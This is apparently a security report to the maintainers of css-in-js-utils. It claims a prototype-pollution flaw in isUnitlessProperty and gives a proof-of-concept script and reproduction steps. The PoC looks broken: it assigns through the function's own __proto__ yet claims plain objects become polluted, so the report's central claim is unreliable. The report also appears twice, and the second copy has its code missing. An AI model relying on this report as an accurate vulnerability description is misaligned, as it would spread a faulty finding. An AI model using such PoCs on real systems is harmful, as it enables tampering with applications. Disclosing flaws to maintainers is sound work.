hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
Vulnerability Cause
The isUnitlessProperty() function uses a cache object. When proto is passed as the property name, it directly pollutes the cache object’s prototype, leading to global pollution.
Vulnerable Code Location
css-in-js-utils/lib/isUnitlessProperty.js
js
if (cache[property]) {
return cache[property];
}
cache[property] = isUnitless; // No filtering
Proof of Concept (POC)
js
const { isUnitlessProperty } = require('css-in-js-utils');
// Trigger pollution
isUnitlessProperty('__proto__');
// Write polluted value
isUnitlessProperty.__proto__.polluted = true;
// Verify pollution
console.log({}.polluted); // Output: true
Reproduction Steps
Install: npm i css-in-js-utils
Run poc.js
If output is true, pollution is successful
Impact
Commonly used in CSS-in-JS libraries; pollution may cause style rendering errors or application instability.
hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
Vulnerability Cause
The isUnitlessProperty() function uses a cache object. When proto is passed as the property name, it directly pollutes the cache object’s prototype, leading to global pollution.
Vulnerable Code Location
css-in-js-utils/lib/isUnitlessProperty.js
js
Proof of Concept (POC)
js
Reproduction Steps
Install: npm i css-in-js-utils
Run poc.js
If output is true, pollution is successful
Impact
Commonly used in CSS-in-JS libraries; pollution may cause style rendering errors or application instability.